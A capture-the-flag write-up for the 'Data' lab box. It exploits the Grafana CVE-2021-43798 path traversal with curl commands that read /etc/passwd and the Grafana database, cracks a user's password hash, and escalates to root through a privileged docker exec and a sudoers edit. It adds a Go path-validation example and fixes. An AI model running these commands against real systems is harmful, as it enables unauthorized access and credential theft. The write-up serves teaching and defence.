Summary
Data is an Easy Linux box built on CVE-2021-43798 (Grafana plugin
path traversal) → SQLite db read → PBKDF2 crack of boris →
SSH → sudo docker exec --privileged, which lets boris mount /dev/sda1
into a container and write /etc/sudoers on the host.
The chain:
- CVE-2021-43798: /public/plugins/alertlist/../../../../etc/passwd → unauth file read.
- Read /var/lib/grafana/grafana.db (SQLite); extract PBKDF2 hashes; crack boris : beautiful1.
- SSH as boris.
- sudo -l: (root) NOPASSWD: /usr/bin/docker exec ...
- docker exec --privileged -u root <container> bash → privileged container; mount /dev/sda1 /mnt; edit /mnt/etc/sudoers to grant boris ALL.
Recon
22/tcp OpenSSH
3000/tcp Grafana 8.0.0 (footer)
TTL suggests Grafana in container; SSH on host
Foothold — CVE-2021-43798
curl -s "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# returns /etc/passwd
curl -s "http://<TARGET>:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" \
-o grafana.db
sqlite3 grafana.db .dump | grep -i 'INSERT INTO "user"'
# -> ... boris : <pbkdf2-blob>
hashcat -m 10000 boris.hash rockyou.txt
# -> beautiful1
ssh boris@<TARGET>
Privesc — privileged docker exec
$ sudo -l
(root) NOPASSWD: /usr/bin/docker exec ...
$ docker ps # find container ID
$ sudo /usr/bin/docker exec --privileged -u root -it <id> bash
# inside container with full host device access
mount /dev/sda1 /mnt
echo 'boris ALL=(ALL) NOPASSWD: ALL' >> /mnt/etc/sudoers
exit
sudo -i # root on host
Why each step worked
- CVE-2021-43798: Grafana 8.0.0 plugin path resolver didn’t canonicalise; .. segments allowed.
- PBKDF2 + weak password: KDF is fine; password isn’t.
- sudo docker exec: equivalent to root because Docker is designed to elevate. --privileged removes container isolation entirely, so host filesystem is reachable.
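The containment check that the first bullet says was missing, as an added Go example (not Grafana's code and not taken from the cited walkthroughs). The directory /srv/plugins/alertlist and the function names are assumptions for illustration, and the request path is taken as already URL-decoded.

```go
package main

import (
	"errors"
	"fmt"
	"path/filepath"
	"strings"
)

// errEscape is returned when a request resolves outside the plugin directory.
var errEscape = errors.New("path escapes plugin directory")

// resolveNaive shows the weakness: Clean on a relative path keeps its
// leading ".." segments, so the Join below walks out of pluginDir.
func resolveNaive(pluginDir, requested string) string {
	return filepath.Join(pluginDir, filepath.Clean(requested))
}

// resolveContained resolves the request, then refuses anything whose path
// relative to pluginDir starts with a ".." segment. Symlinks inside the
// directory are not followed or checked here.
func resolveContained(pluginDir, requested string) (string, error) {
	base := filepath.Clean(pluginDir)
	full := filepath.Join(base, requested) // Join also cleans the result
	rel, err := filepath.Rel(base, full)
	if err != nil || rel == ".." || strings.HasPrefix(rel, ".."+string(filepath.Separator)) {
		return "", errEscape
	}
	return full, nil
}

func main() {
	dir := "/srv/plugins/alertlist" // constructed plugin directory
	reqs := []string{"img/icon.svg", "../../../../../../../../etc/passwd"}
	for _, req := range reqs {
		p, err := resolveContained(dir, req)
		fmt.Printf("request=%s\n  naive=%s\n  contained=%q err=%v\n",
			req, resolveNaive(dir, req), p, err)
	}
}
```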
Counterfactuals
- Patch Grafana ≥ 8.3.1.
- Use a real KDF + strong passwords.
- Don’t sudo docker; use rootless Docker or Podman if non-root container access is needed.
Source attribution
Reconstruction is grounded in:
- 0xdf, “HTB: Data” — https://0xdf.gitlab.io/2025/07/01/htb-data.html
- IppSec, “Data” video walkthrough — https://ippsec.rocks/?#Data
- Grafana CVE-2021-43798 advisory.